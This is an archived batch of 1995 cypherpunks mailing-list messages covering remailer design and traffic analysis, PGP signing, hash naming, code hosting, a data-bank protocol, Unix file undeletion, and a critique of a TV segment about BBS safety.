-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLyrN9UiLvmPjc4XdAQHeuAP/djk9XYKP3YmfdluJN8hMkNajetRAjKVK
i0AvDyMUjN0fs5MXfez6v8tBx65qeWY0WIi8O53O5UzS7JOtiKNF4uLbDfJZiYRW
okgdCutn6l4nHxz7MiNNCo1TXvMvPyYffy+cdPuRwX7IzfxdfaVHqD14e/x+S3Cs
cy9zpuCnho0=
=cDiR
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 8th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Masco <cactus@hks.net>
Date: Sat, 28 Jan 95 15:19:02 PST
To: cypherpunks@toad.com
Subject: NNTP archives
Message-ID: <199501282315.SAA22879@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


If anybody ever actually uses the cypherpunks archives via NNTP on hks.net,
please let me know immediately (we don't log).  I'm probably going to be
putting a reasonable expire time on the group and archive the articles at
expire time: if people use it, I can set up a "cypherpunks archive group"
for NNTP access.

This won't affect folks who use the NNTP access to read cypherpunks
normally: I'll probably set the expire time to something like a month.

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyrP8ioZzwIn1bdtAQF0VQF9HSyCQDkeUMiso29z3TOJY4cuj6EQdjq1
JpRBSoM35ZOfKcTQ2qSIvn6WvLk56pZD
=RAyu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Sat, 28 Jan 95 18:23:29 PST
To: cypherpunks@toad.com
Subject: Re: Encrypted Magazine Subscriptions Via E-Mail?
Message-ID: <v03001112ab50a87b4c14@[140.174.229.179]>
MIME-Version: 1.0
Content-Type: text/plain


>>>why Wired ... don't [use PGP] to make subscribing easier?
>>
>> Because if you saw the low-tech state of the Wired office...
>
>Yup, too busy to automate. After all, if they took orders by email,
>they wouldn't need manual intervention. It all makes perfect
>sense. Why spend effort to lower the amount of time their staff need
>to spend on manual tasks? Makes more sense just to remain buried.

That a bunch of their staff is the minimum-wage "gee, look at my Mac" crowd
might have something to do with it.  I was amazed to find out that there
really are two sides to Wired: the professional computer geeks (eg.
Negroponte) and the professional get-a-magazine-out geeks, and the twain
never seem to meet.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Sat, 28 Jan 95 15:34:08 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Specs
In-Reply-To: <v01510101ab506828bb63@[152.97.12.101]>
Message-ID: <sj_hF_W00WB_5EYYZV@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jaeson M. Engle wrote:

>         Since I have begun the project of writing the Remailer for the
> Mac, I suddenly realized that I do not know exactly what is expected of
> it, and therefore would like some pointers to the specs of a remailer
> (I have seen references to padding and splitting but do not know what
> this is nor how to implement it.)

Well, you could look at some existing code.  My remailer is written in C,
with most of the unix-specific stuff being done by shell scripts, so
you should be able to compile some of the C code on the Mac (if you're
planning to write your remailer in C).

Look in:

ftp myriad.pc.cc.cmu.edu /pub/remailer
ftp cs.cmu.edu /afs/andrew.cmu.edu/usr12/mg5n/public/remailer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 28 Jan 95 16:39:36 PST
To: Michael Sattler <msattler@jungle.com>
Subject: Re: Encrypted Magazine Subscriptions Via E-Mail?
In-Reply-To: <v0300110cab508e0f1717@[140.174.229.179]>
Message-ID: <9501290039.AA21391@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Sattler says:
> >I posed this question in alt.wired. Am I missing something obvious as to
> >why Wired (or magazines in general) don't do this to make subscribing
> >easier?
> 
> Because if you saw the low-tech state of the Wired office you'd understand;
> they're at capacity just opening envelopes and manually entering names and
> addresses off the checques.  Visit them whenever you're in downtown San
> Francisco.

Yup, too busy to automate. After all, if they took orders by email,
they wouldn't need manual intervention. It all makes perfect
sense. Why spend effort to lower the amount of time their staff need
to spend on manual tasks? Makes more sense just to remain buried.

I called and asked the Wired folks why they weren't using PGP. They
said they thought it couldn't be used for commercial purposes. I gave
them phone number for ViaCrypt. They never did anything with it so far
as I can tell.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sat, 28 Jan 95 16:47:00 PST
To: Rhys Kyraden <Jaeson.M.Engle@josaiah.sewanee.edu>
Subject: Re: Remailer Specs
In-Reply-To: <v01510101ab506828bb63@[152.97.12.101]>
Message-ID: <Pine.SUN.3.91.950128194321.1158A-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Jan 1995, Rhys Kyraden wrote:

>         Since I have begun the project of writing the Remailer for the Mac,
> I suddenly realized that I do not know exactly what is expected of it, and
> therefore would like some pointers to the specs of a remailer (I have seen
> references to padding and splitting but do not know what this is nor how to
> implement it.)

	I've started work on a formal remailer standards document that 
describes just how a Cypherpunk Type I remailer should process messages, 
with full header descriptions, etc. After I've checked it against the 
behaviors of all the various Cypherpunk remailer packages (Ghio vs Eric 
Hollander vs Sameer vs Mixmaster in compatibility mode vs whatever else), 
I'll post it here for comments.

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sat, 28 Jan 95 20:22:57 PST
To: cypherpunks@toad.com
Subject: Re: Again, where to upload code?
In-Reply-To: <199501290309.WAA14018@libws2.ic.sunysb.edu>
Message-ID: <199501290422.UAA28890@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Robert Rothenberg <rrothenb@ic.sunysb.edu>

   Tried it. Permission denied.

Did you try reading README.UPLOAD in pub/cypherpunks yet?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 28 Jan 95 21:11:45 PST
To: cypherpunks@toad.com
Subject: Re: Protocols for a Data Bank
Message-ID: <ab50d284000210041752@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 4:39 PM 1/28/95, jpp@markv.com wrote:
>> Date: Sat, 28 Jan 1995 15:49:13 -0800
>> From: norm@netcom.com (Norman Hardy)
>>   [...]
>> Selling Hat Checks: The bank will sell a hat check to anyone who will pay a
>> negotiated price. The hat check specifies the secure hash of the data, the
>> penalty to be paid upon failure to produce the data, and the cost of
>> redeeming the data. The hat check is signed blindly by the bank and is a
>                                              ^^^^^^^
>> bearer instrument. Any holder of a hat check can present the check along
>> with the redemption fee and demand the data.
>
>  Why in the world would the bank want to sign blindly?  The bank
>would be undertaking an obligation of an unknown nature.  Would you
>sign a blank check?  A blank contract?  I wouldn't.
....
You are right. I forgot that the blind signer knows nothing of what we
signs. The protocol requirements seem clear but I lack a protocol. I think
I have a fix but I will be more careful before I post.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Sat, 28 Jan 95 21:11:23 PST
To: cypherpunks@toad.com
Subject: Re: SHA Reference?
In-Reply-To: <199501290240.VAA13762@libws2.ic.sunysb.edu>
Message-ID: <199501290511.VAA17470@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Robert Rothenberg <rrothenb@ic.sunysb.edu> writes:
> Just a question about SHA: how does one distinguish between them?

I think of them as SHA-1 and SHA-2, but I don't know if that's
usual.  When I say simply "SHA" I mean the Revised Standard Version.

	Jim Gillogly
	Trewesday, 8 Solmath S.R. 1995, 05:11




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Date: Sat, 28 Jan 95 18:32:16 PST
To: cypherpunks@toad.com
Subject: Again, where to upload code?
Message-ID: <199501290232.VAA13727@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


I posted this query recently with no replies, then again it's not been
"duped" back to my account either, so I'm not sure if it went through.

I've written some fingerprinting code for MD4, MD5, SHA, RIPE-MD and HAVAL
in assembly language for 386 machiens and would like to make it available,
not sure of an ftp-site... pref. ITAR-safe or are those algorithms not
covered under it?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Date: Sat, 28 Jan 95 18:40:36 PST
To: jim@acm.org
Subject: Re: SHA Reference?
In-Reply-To: <199501282027.MAA17185@mycroft.rand.org>
Message-ID: <199501290240.VAA13762@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just a question about SHA: how does one distinguish between them?

Is the older sha called "SHA" and the newer one "Revised SHA" or is it
"Former-SHA" and "SHA"?

It's a minor point, but still a confusing one. (It'll be more confusing if
there are more than two...)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 28 Jan 95 18:45:11 PST
To: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Subject: Re: Again, where to upload code?
In-Reply-To: <199501290232.VAA13727@libws2.ic.sunysb.edu>
Message-ID: <9501290244.AA21613@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I suspect ftp.csua.berkeley.edu will take them... Sameer?

Perry

Robert Rothenberg says:
> I posted this query recently with no replies, then again it's not been
> "duped" back to my account either, so I'm not sure if it went through.
> 
> I've written some fingerprinting code for MD4, MD5, SHA, RIPE-MD and HAVAL
> in assembly language for 386 machiens and would like to make it available,
> not sure of an ftp-site... pref. ITAR-safe or are those algorithms not
> covered under it?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiego.ATTGIS.COM>
Date: Sat, 28 Jan 95 22:16:21 PST
To: cypherpunks@toad.com
Subject: Re: MS Office NT
Message-ID: <9501290109.aa00772@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


Re: Office for NT, kahuna@fc.net writes:
>I installed it yesterday, and played with it for about 5 minutes. ... I
>wasn't able to save more than 8.3 in powerpoint, but Word did recognize this
>feature, and I saved a file as 13456789012345.doc without a porblem.  ...yay?

This is one of the major features in NT, why the hell would they bother
shipping it if it didn't support 255 char names???

                                     ...  __o
                                    ..   `\<,
Chris.Claborne@SanDiegoCA.ATTGIS.COM...(_)/(_).            CI$: 76340.2422
---------------------------------------------------------------------------
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Available on any Pub Key server.
PGP encrypted mail welcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Date: Sat, 28 Jan 95 19:09:45 PST
To: perry@imsi.com
Subject: Re: Again, where to upload code?
In-Reply-To: <9501290244.AA21613@snark.imsi.com>
Message-ID: <199501290309.WAA14018@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I suspect ftp.csua.berkeley.edu will take them... Sameer?
> 
> Perry

Tried it. Permission denied.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 28 Jan 95 19:11:45 PST
To: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Subject: Re: Again, where to upload code?
In-Reply-To: <199501290309.WAA14018@libws2.ic.sunysb.edu>
Message-ID: <9501290311.AA21674@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



You need to make arrangements beforehand...

Robert Rothenberg says:
> > I suspect ftp.csua.berkeley.edu will take them... Sameer?
> 
> Tried it. Permission denied.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Date: Sat, 28 Jan 95 19:50:23 PST
To: Todd Masco <cactus@hks.net>
Subject: Re: NNTP archives
In-Reply-To: <199501282315.SAA22879@bb.hks.net>
Message-ID: <Pine.3.89.9501282218.A585148030-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I would like to use it to read c'punks in netscape.   what do I put in 
the box which says NTTP news reader?  just putting the machine name seems 
to produce no result...

A.Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law  |
U.Miami Law School          | MFROOMKI@UMIAMI.IR.MIAMI.EDU
PO Box 248087               | 
Coral Gables, FL 33146 USA  | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Masco <cactus@hks.net>
Date: Sat, 28 Jan 95 20:29:06 PST
To: cypherpunks@toad.com
Subject: Re: NNTP archives
Message-ID: <199501290425.XAA25516@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Michael Froomkin writes:
 > I would like to use it to read c'punks in netscape.   what do I put in 
 > the box which says NTTP news reader?  just putting the machine name seems 
 > to produce no result...

Not knowing netscape, I couldn't tell you.  The newsgroup name should
probably be in there, tho: it's hks.lists.cypherpunks on nntp.hks.net.
The URL might be something like "nntp://nntp.hks.net/hks/lists/cypherpunks"
or "nntp://nntp.hks.net/hks.lists.cypherpunks", but I'm just guessing.
- --
Todd Masco     | "If we don't make utter fools of ourselves from time to time,
cactus@hks.net |  we grow smug - that is, we do not grow at all." - T. Peters
     Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLysYkSoZzwIn1bdtAQGEXgF/QzfXQmikP3AGwXBjJaUPPXPDpmy8dlVM
NDcjQbtG125EIoBXGLa9GR6dfrp4HhBy
=fGHU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sat, 28 Jan 95 21:48:02 PST
To: nzook@bga.com (Nathan Zook)
Subject: Re: Why encrypt intra-remailernet.
In-Reply-To: <Pine.3.89.9501281651.A2705-0100000@edwin.bga.com>
Message-ID: <199501290547.AAA20285@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook:
|  
|     Suppose Alice sends Bob a message e(M) through Chaum.  Eve, a stong
| opponent, wants to trace the message.  She keeps track of all outgoing mail
| from Alice, an MD5 hash of all incoming messages to Bob, and outgoing from
| Bob.  Eve then sends Chaum e(M), and waits for a matching MD5 to Bob that
| doesn't correlate to an outgoing MD5 from Bob.  (Eve knows that Bob is a
| remailer.)
|  
|     Gentlemen, I believe that I have just stumbled upon a strong proof of
| the necessity of remailer auto-encryption of all messages.  Since the
| session key is PRG, MD5 will change (a lot;).  Furthermore, remailer auto-
| encryption allows the mailers to number their messages to each other.  A
| low number means a re-transmit from the remailer, which is not possible,
| unless some sort of ACK system is in place, and even then, would still
| flag.  Of course, if the remailers _sign_ their messages (on the way out)
| as well, you could compare the timestamps of the signatures with the
| message itself.

	This is strong argument for encrypting your chain of messages,
using premail, or chainmail, or something similar.  Why the remailers
should do this is not clear at all from your argument.  Remailer
operator should be discouraged from cooperation beyond that which is
needed.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Sun, 29 Jan 95 01:16:13 PST
To: storm@marlin.ssnet.com
Subject: Re:  Philadelphia CyberCrime
Message-ID: <9501290914.AA08224@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> Heard on the news today that they arrested a plumber and are holding
> him in lieu of $50,000 bail.
> He used a PC to crack into the phone system and set up 'Ultra' call
> forwarding which forwarded calls to other plumbers businesses to his.
> He then took the calls and told the callers that his company was
> covering for the one they actually called.

The irony is that the original dial telephone switch
was invented to prevent this kind of problem, 
by a Kansas City undertaker named Strowger who thought his 
competitor was bribing the phone operators to redirect business,
and wanted to get the humans out of the loop.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Sun, 29 Jan 95 01:35:47 PST
To: cypherpunks@toad.com
Subject: Re:  Even more unix holy wars.
Message-ID: <9501290933.AA08361@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


(Undeleting files is a security issue that's still got 
_some_ tenuous connection to cypherpunks :-)

> How would I go around undeleting a file under Unix?  It's easy on the
> Mac.  Doing it under DOS is ugly, but it works.  But with unix, there
> is no way.

Sure there is.  Multiple ways, depending on your objectives.
All with different syntax, since this _is_ Unix :-)

The simple way, implemented by lots of universities, is a fake delete,
which actually renames or moves the file to some hidden location
instead of deleting it; the undelete program renames it back,
and there's a space-scavenger that genuinely deletes old
rename-deleted files after a few days.  Undeletes after that
consist of getting the file from tape backup.

While the System V filesystem doesn't save enough pointers to 
guarantee getting complete files back from deletion (if the space
they used hasn't been reused already), there have been undeletes
that scrounge up the newest n blocks off the free list.  Of course,
those were the first blocks to get used in new files, so it wasn't
much use in a multi-user system, but it was there.  Besides,
disk drives on multi-user machines are always >95% full,
and often over 98% full, so deleted files are fair game anyway...

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Sun, 29 Jan 95 05:08:35 PST
To: cypherpunks@toad.com
Subject: Heavy Weather
Message-ID: <199501291307.FAA13336@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Just finished reading Bruce Sterling's newest novel.  
    I enjoyed it and suggest it will interest hard sci-fi fans.
    Its a very much post cypherpunk world he writes about, e.g.:

    "    ... It all had to do with unbreakable encryption, digital
    authentification, anonymous remailing, and network untraceability.
    These were all computer networking techniques that had once been
    considered very odd and naughty.  They were also so elementary to
    do, that once they were in place, they couldn't be stopped 
    without tearing the whole Net down.

    Of course once these techniques were in place, they conclusively
    destroyed the ability of governments to control the flow of
    electronic funds, anywhere, anytime, for any purpose.  As it
    happened, this process had pretty much destroyed any human control
    at all over the modern electronic economy. ..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Sun, 29 Jan 95 02:51:09 PST
To: cypherpunks@toad.com
Subject: Tabloid TV coverage of pedophiles using BBS - with feedback #s
Message-ID: <m0rYXEE-0002H6C@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


On TV as I am hacking here, is some Tabloid Trash called
"The Crusaders",  which I would have definitely flipped off
once the late movie was over, if it hadn't been for these
'intriguing' sound bites they ran:

"Your children may fall victim to pedophiles in the safety of
 their own bedroom!  And the Crusaders are out to stop them..."

"The newest high tech scheme sex offenders use on your children,
 and how you can stop it!  Child molestors on your home computer!"

I am staying tuned through stories on adoption reunions and nursing 
home neglect, just to see how to protect my children...

(20 min. later)

They show a lot of kids using computers, then modems and BBS systems.
They mentioned the usefulness of nets for 'homework' and games, but:

"We recently tapped into a bulletin board containing hordes of files,
 from lingerie shots to shocking pictures... that show anything goes."

"10% of the adult population on the boards are looking to solicit children,
 says a police chief in (Amish country in PA)."

From there I expected a lot worse, but actually it got a whole lot better:

"Talk to your kids, and don't use the computer as a babysitter... parents
 need to know there are dangerous people out there..."

An FBI expert said that the 'best way' to combat pedophiles was to educate
police how computers work, and second to make people aware without implying
that a computer is a bad thing.  He said he thought teenagers would seek
out sexually explicit material and that current 'protections' (e.g. warnings
on explicit files) were inadequate.  [What this had to do with pedophilia he
didn't say.  All the kids interviewed had been solicited on other premises...
e.g. one had been lured to a pedophile's home to install a non-existent net.
It seems that none of the pedophiles had lured kids with sexual materials
but no point was made of this.  They indirectly implied a relationship.]

Other advice offered was to keep kids from offering personal information on
the BBSs, and to accompany your child the first time they go to meet someone
they met on a BBS.

There was no brainless advocacy of censorship, nor a call to ban anoynimity
(although the police chief in PA said he thought pedophiles were 'emboldened'
by the 'anonymous computer environment' which is probably more or less true),
even though they talked directly to one (male) kid who'd actually been raped.
This was exploitative, but it was also real, and it was just stark enough to
make the point.  No hysteria, the kid was calm.  This was the kid who had
been lured to install the net.

Given that they actually gave practical advice that might actually work and
was not generally hysterical, it was about as good as one might expect.  They
fell short of saying that the pedophilia was isolated and unrelated to most
of the graphic material on the boards.  The "10%" was the only number they
offered. Apparently they could find only 2 convictions for BBS-related pedo-
philia in the US.  

Actually it seemed to me that the most objectionable things was this crazy
10% estimate, which might mean 10% of the adults on purely porn-oriented BBS
sites, but it was left implied that 10% of *all* adult BBS/network users were
trying to lure children into sexual situations!

After that the most objectionable thing was the hysterical tag lines which
are mandatory on Tabloid TV.  They didn't seem to be written by the reporter.

Reporter's name was Howard Thompson, editor was Ralph Herman
Fax number for the show is 818-841-6500.

Transcripts of the show are available for $6 at 1-800-777-T-E-X-T (Burrelle)

Craig








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 29 Jan 95 06:46:52 PST
To: cypherpunks@toad.com
Subject: Re: Secure (?) Remailer-net
Message-ID: <Pine.3.89.9501290816.A10826-0100000@edwin.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


First, in case you all haven't noticed, I am seriously async here.  Sorry
that I sometimes seem to alternately really miss or firmly grasp the
obvious.


From: Hal <hfinney@shell.portal.com>
>From: Nathan Zook <nzook@bga.com>
>>     The traffic analysis that we've seen so far mainly just documents
>> tcmay's "everybody a remailer" concept.  If you look, you will notice that
>> these analyses all assume that Alice and Bob are _not_ remailers
>> themselves, and for a good reason.  If Alice and Bob _are_ remailers,
>> analysis of the type used here is worthless, especially if Alice and Bob
>> have a policy of not sending any mail unless they first receive garbage,
>> and of sending out garbage whenever they get a letter.
>
>Realistically, though, everybody is not a remailer, and there are no
>prospects of everybody becoming a remailer anytime soon, so the analyses
>of Wei and others are certainly relevant.
>


Yes, but... 
Presumably those who feel that they need remailer and are willing to put
out the effort to use one might also feel that they need a higher level of
security.  I suppose that my remark might be more accurately:
"mainly just documents the superiority of the 'everybody a remailer'
concept for TA purposes."  Of course, if the remailer-in-a-box isn't much
harder to use than PGP was two years ago, then maybe "everybody" will...


>>     HOWEVER, the analysis makes another assumption--that messages are
>> indistinguishable.  This assumption does not correlate, as I understand it,
>> with the current remailer net.
>
>Mixmaster is supposed to do splitting and, I think, padding.  I hope to
>have time to look at it soon.  It sounds very good.
>
>>     First, the message is signed with the sender's key.  (More on that
>> later.)
>
>I did not see why this should be done.
>

No?  Isn't the InterNet currently under a serious packet-spoofing attack?
Don't we expect Eve to be AKA NSA?  If I run a remailer, I want to know
that I'm not being lied to in the process.  That insistance might just save
the legal butt of the guy being spoofed, by demonstrating that the packet
did not in fact originate from the remailer.  Just because remailers are
legal doesn't mean that the govt won't still try to shut them down...


>>     Suppose a signed message to be forwarded is smaller than the standard
>> packet size.  The sending remailer adds a Cutmarks:  header.  At the end of
>> the message, the cutmark is added, followed by sufficient garbage to fill
>> out the standard packet size.  The message is then pgp'ed to the recipent
>> _with COMPRESS = OFF_.
>
>A better approach IMO is to embed the message length in the encrypted
>information (as PGP does) and pad with cryptographic random garbage
>(which PGP could be patched to do).
>

In this instance garbage is defined as cryptographic random.  If the
message has a length indicator in the clear, then Eve can read it.
(Remember, Eve runs snakoil@nsa.gov.)  Therefore, such a marker has to be
_inside_ the wrapper.  Given this, (that everything is PGP wrapped) there
is always the chance that PGP will compress a message, even one with
cryptographically strong bits in the end.  While compression can improve
protection, it is not likely to do so if the original message was already
PGPed.  Only "clear" messages, therefore, risk losing protection.  As you
note, such messages don't deserve as much help as opaque ones.


>>     Upon receipt, the message is decrypted, and its origination can then be
>> triply verified (at least).  From: line, packet size, and PGP signature.
>> Since the message claims to be from a packeting remailer, the packet size
>> should be the standard one.  The recipient now has the message that was
>> sent to it.  This message is probably itself encrypted, so it can be
>> handled (almost) as if this message were just received.  This includes
>> stripping the garbage and (probably) decrypting the message to get the
>> forwarding information.
>
>Why does the remailer care where the message came from?  What difference
>does that make?  I can see the final recipient caring about the original
>sender, so a PGP sig makes sense at that level, but why at each hop?
>

See below.  Basically, we don't want to be spoofed ourselves.  Bad
security for our systems.  Admittedly, this is probably not a real problem
today.  See my sig.


>>     Note that this system would allow the extropian remailer to be
>> compatible with Matt Ghio's alias system.  (Right now, the remailer doesn't
>> like separate pgp packets, or packets it can't read, or something.) Under
>> the current system, the precausion is entirely warranted.
>
>I don't think so.  The problem with Miron's extropy remailer is that it
>only passes through the contents of a PGP block.  For anonymous addresses
>to work, the (chained,encrypted) address must be in a PGP block which
>precedes the message body.  I don't see how any cutmarks idea would
>affect this.
>

Sure it does.  If the whole thing is inside a PGP wrapper, then it is
secure.  "Only passing through the contents of a PGP block" is currently a
security measure that makes good sense.  But if you have two separate
blocks _inside_ an outer wrapper, you already have full security.  Strip
off the outside, find two more wrappers.  Strip the first, get remailing
instructions.  Attempt to strip the second.  Fail.  Attach second wrapper
to forwarded message.  Full security.


>>     To make life even more fun, there is no good reason that non-remailers
>> cannot be in on the action!  Alice, sending to Bob through Chaum, pretends
>> to be a remailer.  That is, she prepares her message to Bob, (encrypted),
>> and adds the Request-Remailing-To:  Bob@nowhere.org, and signs it.  She
>> then observes that the message is too small, so she adds the Cutmarks:
>> header, etc.  When Chaum receives the packet, he opens it, removes the
>> cutmarks, and sees a signature he does not know.  Chaum then sends a
>> request to pgp-key-server@omniscient.gov for the key, and holds the message
>> until he gets it.  He then compares the address and name on the key
>> recieved to the message.  The signature is good, so he is ready to send the
>> packet to Bob.
>
>Again, why does the remailer go to all this trouble to verify a
>signature from Alice?  That sig is for Bob!  She may not even want to
>post her public key for everyone; Bob may be the only one who has it.  I
>don't understand why the remailer, which exists to hide identities, is
>going to such trouble to verify them on its own.
>

Alice signs her messages to the remailer because she doesn't want anyone
spoofing her use of the remailer.  If a message goes in at 00:00:00.01, 1
Jan, 2001 that is "From:" her, it is FROM her.  More of the same reasoning.
This key doesn't have to have anything to do with the key she uses with
Bob.  It is the one that she wants the general public to use for HER.


>> But Bob can be in on the game as well, since there is no
>> reason that he cannot handle the Cutmarks:, the signature, and the nested
>> encryption.  In fact, Alice could include a copy of Bob's key in the
>> message for Chaum to use, after a Recipient-Key:  header.
>
>Alice is the one who should encrypt the message for Bob, not the
>remailer!  Are you suggesting that she should let the remailer see the
>message contents?
>

NoNoNoNoNoNoNo! ;) The key she includes is Bob's public key.  The same one
that is on the key servers.  This is so the message can be standard sized
for the final trip to Bob.  As we have noted, messages are quite vulnerable
at this stage.  If every message that Bob gets from Chaum "looks the same",
who is to say which is which?


>> Bob can also
>> verify that the message was actually routed through Chaum.
>
>Why on earth does he care?  I really don't see what problem you are
>solving here with all this checking.
>

Suppose you were using the remailer net.  Would you care to know that
someone was spoofing a node?  I would.  It would indicate that someone is
either hacking the system (probably no big deal), or that someone might be
shadowing a remailer.  That is, the remailer is no longer secure.  Spoofing
is a big deal on the net generally, and if we start being used a lot, we
will have to deal with it as well.  Why not now?


>> If Chaum is
>> concerned that, at some future time, Eve might supeona his key ring in
>> order to demonstrate that Alice and Bob are using Chaum, Chaum can
>> alternately request keys that he does not need from the servers, and delete
>> (older) keys in the ring.
>
>Eve would be more likely to subpoena Chaum's secret key ring.  A public
>key ring proves nothing.
>

Ever hear of "guilt by association"?  See my sig.


>>     In other words, if all the remailers can handle nested pgp packets and
>> cutmarks, we are close to moving all small messages to a standard size.
>
>This mostly makes sense (although as I said I prefer simply enhancing the
>crypto program to take a parameter for output pad size) but I don't see
>where all the rest of it came from.
>

If the message length is world readable, it is world readable.  The super-
wrapping makes sure that it is not.  It also makes clear messages
indistinguishable from opaque ones inside the net.  See below.


>>     What if the file is too big?
>>  
>>     If the file is too big, break it in pieces.  We need a header,
>> Multipart Message:  n of m.  Note that since this is assumed to be _inside_
>> a pgp wrapper, it is secure.  The recipient could hold and merge the files
>> as needed.  If the message to be forwarded is too big, split and continue.
>> Since the messages are ascii armored, the split/combine protocal is to
>> concatenate.  Message parts could be made equal size to minimize the chance
>> of a message barely bumping over the limit as it moves.  Of course, Alice
>> could break her message to Bob directly, but we cannot assume that all
>> would do this for us.
>
>I believe Mixmaster provides a client mode to do this.  I prefer putting
>more functionality in the hands of the users and not relying on kindly
>old Uncle Remailer to do it for you.
>

Yes, but...  Breaking an overly large file makes it indistinguishable from
standard sized ones.  See below.


>>     This also means that if Alice sends a message to Bob in the clear
>> through Chaum, and David, that the message will be encrypted from Chaum to
>> David.  Thus, if Eve wants to know which message from Chaum to David is the
>> one from Alice to Bob, (perhaps to know that it is _not_ the message from
